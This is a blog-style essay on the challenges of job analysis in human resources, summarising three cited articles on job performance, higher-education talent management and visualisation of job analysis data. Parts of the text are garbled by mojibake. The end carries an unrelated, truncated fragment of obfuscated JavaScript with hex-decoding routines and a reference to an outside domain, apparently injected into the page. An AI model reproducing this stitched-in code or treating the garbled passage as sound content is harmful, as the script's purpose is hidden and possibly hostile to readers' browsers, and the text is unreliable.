
Monday, September 16, 2019

Challenges of the Job Analysis Process Essay

With internal and external factors such as budgetary constraint, technological advances and demographics are making it more challenging for Human Resource Management. Companies as well colleges and universities are finding it more difficult to forecast and plan for the future. With the help of HR strategies and methods companies are able to utilize available resources to recruit and hire suitable candidates. Human Resource professionals’ development methods for posting vacancies, developing and implementing recruitment strategies, identifying and selecting candidates, assuring all pre-employment requirements are met, and confirming job offers. Since a large number of applications are received each year, it is impossible to interview of all applicants by Human Resources Department. However, all applications are reviewed and applicants whose qualifications and experience seem most appropriate to the opening for which they have applied are generally selected for screening interviews with the Office of Human Resources or the hiring department. This process is where forecast, planning, job analysis and human resource strategies are crucial when creating a strong workforce. Impact Of Job Analysis On Job Performance: Analysis of a Hypothesized Model found in the Journal of Diversity Management. This study was based on a study of employees of Pakistan Public sector regulatory authorities of telecommunication, oil and gas, power, media, security exchange, banking sector and organizations being regulated by these authorities is an attempt to develop and test a hypothesized model linking HR importance of job analysis with employee job performance. The study concluded that the Human Resource Management must develop better tools to measure the effectiveness of the job analysis process. The job analysis process is not a singularly a good measurable tool for performance. However it can prove to be a useful way to tie together employee performance standards. It is with guarded optimism, to solely rely only on practices to prove a direct link with the analysis and desired outcome. A job analysis model may be a tested method to provide factual evidence to give HR professionals to link their efforts with the job performances. Works Cited: Safdar, Rehman, Ajmal Waheed, and Khattak Hamid Rafiq. â€Å"Impact of Job Analysis on Job Performance: Analysis of a Hypothesized Model.† Journal of Diversity Management 5.2 (2010): 17-36. Business Source Complete. Web. 22 Sept. 2013. Strategic HR and Talent Management in Higher Education This article addresses the challenges of seeking a talented and diverse faculty and staff for colleges and universities. In this ever changing world of higher education, the Human Resource professionals must seek faculty and staff members domestically as well as globally to stay competitive and relevant with today’s students. Human Resources department are using well tested methods for recruitment and selection such as: †¢ Job analysis and the establishment of required and preferred qualifications based on position requirements; †¢ Development of effective and efficient sourcing and outreach processes that attract talented and diverse candidates; †¢ The ability to market the institution as an employer of choice; †¢ Training hiring authorities and search committees on structured interviewing and screening procedures; †¢ Assessment of candidates using standardized, valid instrumentation and assessment; †¢ Development of hiring policies and accountability structures; †¢ Ensuring compliance with federal and state nondiscrimination laws. In conclusion, with budgetary challenges’ many colleges and universities face, Human Resources is still expected to find the most talented and respected faculty members to help increase recognition in the area of higher learning. Human Resource professionals in colleges and universities have yet to take advantage of existing opportunities to develop solid approaches for both faculty and staff to participate in the job analysis development plans regarding moving talent management practices into viable programs and proposals. Work Cited: Strategic HR and Talent Management in Higher Education. (2012). ASHE Higher Education Report, 38(1), 45-67. New Tricks for an Old Dog: Visualizing Job Analysis Results For several years many Human Resource professionals have used the same job analysis methods to gather information to develop job characterizations. These methods have proven to be very reliable and effective. However, technological advances in data analysis and visualization techniques offer opportunities to incorporate new practices and build upon the success of past methods. Data analysis techniques that intermingle visualization offer an opportunity to better interpret job analysis results, thus making study results more influential and efficient. As defined the article, information visualization and knowledge visualization are young interdisciplinary fields that draw heavily from cognitive science, visual perception, and computer science. Information visualization is the representation of selected features or elements of abstract and complex data. Whereas information visualization requires the use of computer-supported tools to analyze large amounts of data, knowledge visualization involves the transfer of knowledge among persons. Both methods rely on competency based job analysis and web based surveys. In summary, it has been proven that visualization of job analysis information is an effective and efficient method for collecting and presenting data. However, very little research has been done in this area. Instead, Most Human Resource professionals continue to rely on the same methods of collecting data for creating job description and KSA’s. With the help of technology, visualization techniques may prove to be more effective and more efficient for gathering and interpreting job analyses. Now is the time to explore and adopt new methods as the workforce is continuing to become more competitive and challenging. Work Cited: Stetz, Thomas A., Scott B. Button, and W. Benjamin Porr. â€Å"New Tricks for an Old Dog: Visualizing Job Analysis Results.† Public Personnel Management 38.1 (2009): 91-100. Business Source Complete. Web. 22 Sept, 2013. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=†Ã¢â‚¬ ,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "studymoose.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

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